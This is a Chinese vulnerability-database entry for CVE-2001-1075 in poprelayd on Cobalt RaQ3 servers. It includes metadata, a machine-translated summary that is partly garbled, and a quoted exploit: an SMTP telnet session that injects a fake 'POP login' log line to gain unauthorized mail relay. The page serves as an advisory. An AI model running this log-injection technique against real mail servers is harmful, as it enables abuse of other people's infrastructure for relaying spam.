Cobalt RaQ3服务器漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106418 漏洞类型 未知
发布时间 2001-07-04 更新时间 2006-08-28
CVE编号 CVE-2001-1075 CNNVD-ID CNNVD-200107-050
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20994
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-050
|漏洞详情
CobaltRaQ3服务器中的poprelaydscript2.0之前版本存在漏洞。远程攻击者可以为了继电保护通过导致包含被注入到maillog日志文件的攻击者IP地址"POPloginbyuser"字符绕过验证。
|漏洞EXP
source: http://www.securityfocus.com/bid/2986/info

poprelayd is a script that parses /var/log/maillog for valid pop logins, and based upon the login of a client, allows the person logged into the pop3 service to also send email from the ip address they're accessing the system with.

poprelayd doesn't authenticate output to the /var/log/maillog file. This makes it possible for a user to create an arbitrary string via sendmail that will be logged to the file, thus allowing a remote user to relay mail through the SMTP server. 

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required
|参考资料

来源:BUGTRAQ
名称:20010709Re:poprelaydandsendmailrelayauthenticationproblem(CobaltRaq3)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-07/0150.html
来源:XF
名称:cobalt-poprelayd-mail-relay(6806)
链接:http://xforce.iss.net/static/6806.php
来源:BID
名称:2986
链接:http://www.securityfocus.com/bid/2986
来源:BUGTRAQ
名称:20010703poprelaydandsendmailrelayauthenticationproblem(CobaltRaq3)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-07/0064.html